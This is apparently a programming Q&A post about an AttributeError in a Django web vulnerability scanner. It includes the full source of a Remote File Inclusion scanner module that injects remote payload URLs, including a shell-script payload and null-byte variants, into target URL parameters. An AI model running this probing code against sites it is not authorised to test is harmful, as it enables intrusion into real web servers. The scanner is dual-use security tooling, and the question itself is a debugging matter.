# AttributeError: 'rfi' object has no attribute 'report_data'

Tags: python, python-3.x, django

**I am implementing a web-vulnerable scanner.**

I have created a class `rfi.py` I am trying to get the report
after scanning the **URL** . I crated the object of *rfi.py* classes and call the `rfi_obj.scan()`  But It's given error as below:

```
Exception in thread Thread-8:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/azharul/Django-projects/ThirdEye/scanner/views.py", line 28, in start_scan
    scanner.start_scanning()
  File "/home/azharul/Django-projects/ThirdEye/scanner/scanner_files/scanner_OOP.py", line 346, in start_scanning
    self.full_report.append(self.rfi_obj.report_data)
***AttributeError: 'rfi' object has no attribute 'report_data'***
```

** The report_data **

```
...
                report["status"] = "Vulnerable"
                report["threat"] = "Crtical"
                report["endpoints"].append(web0x0)
....
```

**I declared the *report* at first **

```
report = {
    "type" : "Remote File Inclution",
    "status" : "Not Vulnerable",
    "endpoints" : [],
    "threat" : "None"
}
```

**rfi.py**

```
#!/usr/bin/env python3
# coding: utf-8

import os
import sys
import time

import urllib.request
from time import sleep
from tidos_core.Core.colors import *
from tidos_core.methods.tor import session


info = "This module scans the target site for Remote File Inclusion vulnerabilities by either a specific attack, or by brute force."
searchinfo = "Remote File Inclusion Scanner"
properties = {"PARAM":["Directory and Parameter to attack (eg /vuln/page.php?q=lmao)", " "], "PARALLEL":["Parallelise Attack? [1/0]", " "], "DICT":["Path to dictionary to be used in normal attacks (default: files/fuzz-db/rfi_paths.lst)", " "]}


payload_url = 'https://raw.githubusercontent.com/VainlyStrain/TIDoS/master/tmp/TIDoS'
payload_1 = '#!/bin/sh'
payload_2 = 'cd /opt/TIDoS'
payload_3 = 'python /opt/TIDoS/TIDoS.py'

report = {
    "type" : "Remote File Inclution",
    "status" : "Not Vulnerable",
    "endpoints" : [],
    "threat" : "None"
}

def cust0x00(param_dir):
    
    params = open(param_dir, "r").readlines()
    for param in params:
        test(param)


def test(web00):
    requests = session()
    if (('=' in str(web00)) and ('?' in str(web00))):
        web00 = str(web00)
        web0x0 = web00.split('=')[0]
        web0x0 = web0x0 + '='
        print(B+' [+] URL : '+C+web0x0)
        print(G+' [+] Url successfully parsed!')
        print(GR+' [*] Trying basic fetch...')
        payload = 'https://raw.githubusercontent.com/0xInfection/TIDoS-Framework/master/files/payload-db/json_payloads.lst'
        web000 = web0x0 + payload
        time.sleep(0.5)
        print(C+' [+] Payload Url : '+payload)
        print(GR+' [*] Fetching '+C+web000)
        om = u' '.join(requests.get(web000).text).encode('utf-8').strip()
        pm = str(om)
        if '''{"__class":"null","A":"B"}''' in str(pm) and '''{"toJSON":"while(1);"}''' in str(pm):
            print(G+' [+] Heuristics reveal that '+O+web00+G+' is vulnerable to Remote File Inclusion!')
            time.sleep(0.5)
            print(O+' [*] Confirming the vulnerability...')
            time.sleep(0.6)
            print(GR+' [*] Trying to load executable scripts...')
            web0x00 = web00 + payload_url
            print(C+' [+] Payload : '+B+payload_url)
            print(GR+' [*] Fetching '+C+web0x00)
            oom = requests.get(web0x00).text
            pom = str(oom)
            if ((payload_1 in pom) and (payload_2 in pom) and (payload_3 in pom)):
                print(G+' [+] Remote File Inclusion at '+O+web00+G+' is confirmed!')
                data = "Confirmed RFI Vulnerability @ " + web00 + "!"
                
                report["status"] = "Vulnerable"
                report["threat"] = "Crtical"
                report["endpoints"].append(web0x0)
                
                return
            

        elif 'Warning'.lower() in pm.lower():

            if (('=' in str(web00)) and ('?' in str(web00))):
                web00 = str(web00)
                web0x0 = web00.split('=')[0]
                web0x0 = web0x0 + '='
                print(O+' [!] Heuristics reveal that the page may be vulnerable to RFI!')
                print(C+' [*] Trying null byte character injection...')
                payload1 = 'https://raw.githubusercontent.com/0xInfection/TIDoS-Framework/master/files/payload-db/json_payloads.lst%00'
                web000 = web0x0 + payload1
                time.sleep(0.5)
                print(C+' [+] Payload : '+payload1)
                print(GR+' [*] Fetching '+C+web000)
                om = u' '.join(requests.get(web000).text).encode('utf-8').strip()
                pm = str(om)
                if '''{"__class":"null","A":"B"}''' in str(pm) and '''{"toJSON":"while(1);"}''' in str(pm):
                    print(G+' [+] Heuristics reveal that '+O+web00+G+' is vulnerable to Remote File Inclusion!')
                    time.sleep(0.5)
                    print(O+' [*] Confirming the vulnerability...')
                    time.sleep(0.6)
                    print(GR+' [*] Trying to load executable scripts...')
                    web0x00 = web00 + payload_url
                    print(C+' [+] Payload : '+B+payload_url)
                    print(GR+' [*] Fetching '+C+web0x00)
                    oom = requests.get(web0x00).text
                    pom = str(oom)
                    if ((payload_1 in pom) and (payload_2 in pom) and (payload_3 in pom)):
                        print(G+' [+] Remote File Inclusion at '+O+web00+G+' is confirmed!')
                        data = "Confirmed RFI Vulnerability @ " + web00 + "!"
                        
                        report["status"] = "Vulnerable"
                        report["threat"] = "Crtical"
                        report["endpoints"].append(web0x0)
                        
                        return
            
        else:
            if (('=' in str(web00)) and ('?' in str(web00))):
                web00 = str(web00)
                web0x0 = web00.split('=')[0]
                web0x0 = web0x0 + '='
                print(O+' [!] Heuristics reveal that the page may not be vulnerable to RFI!')
                print(C+' [*] Trying null byte character injection...')
                payload1 = payload_url+'%00'
                web000 = web0x0 + payload1
                time.sleep(0.5)
                print(C+' [+] Payload : '+B+payload1)
                print(GR+' [*] Fetching '+C+web000)
                om = u' '.join(requests.get(web000).text).encode('utf-8').strip()
                pm = str(om)
                if (("I'm Feeling Lucky" in pm) and ('Google Search' in pm)):
                    print(G+' [+] Heuristics reveal that '+O+web00+G+' is vulnerable to Remote File Inclusion!')
                    time.sleep(0.5)
                    print(O+' [*] Confirming the vulnerability...')
                    time.sleep(0.6)
                    print(GR+' [*] Trying to load executable scripts...')
                    web0x00 = web00 + payload_url
                    print(C+' [+] Payload : '+B+payload_url)
                    print(GR+' [*] Fetching '+C+web0x00)
                    oom = requests.get(web0x00).text
                    pom = str(oom)
                    if ((payload_1 in pom) and (payload_2 in pom) and (payload_3 in pom)):
                        print(G+' [+] Remote File Inclusion at '+O+web00+G+' is confirmed!')
                        data = "Confirmed RFI Vulnerability @ " + web00 + "!"
                        
                        report["status"] = "Vulnerable"
                        report["threat"] = "Crtical"
                        report["endpoints"].append(web0x0)
                        
                        return
                    
                else:
                    data = "(custom) no vulnerability found."
                    print(R+' [-] This RFI module could not find out any RFI.')
                    print(O+' [-] This module is extreme basic (more improvements on the way).')
    else:
        print(R+' [-] URL without parameter : '+O+web00)


def rfi_main(web, param_dir):
    
    cust0x00(param_dir)

class rfi:
    
    def __init__(self, web, param_dir):
        self.web = web
        self.param_dir = param_dir.replace("bug", "lfi")
        
    def scan(self):
        rfi_main(self.web, self.param_dir)
        
        self.report_data = report
```

Comment: What is the correct way to get the solution? Please.

Comment: You only set the attribute `report_data` on the instance after the `scan` method is called. Before it is called that attribute doesn't exist. Also looking at the code report is a global variable? Why set an instance variable of a class to a global variable? You need to properly consider the design of your code.

Comment: @AbdulAzizBarkat Thanks for your comment. Yes, ```report``` is global variable. 
And same thinks working with my another class.

** ldap.py**

`
class ldap:
    
    def __init__(self, web, param_dir):
        self.web = web
        self.param_dir = param_dir.replace("bug_", "")
        
    def scan(self):
        ldap_main(self.web, self.param_dir)
        
        self.report_data = report
        
`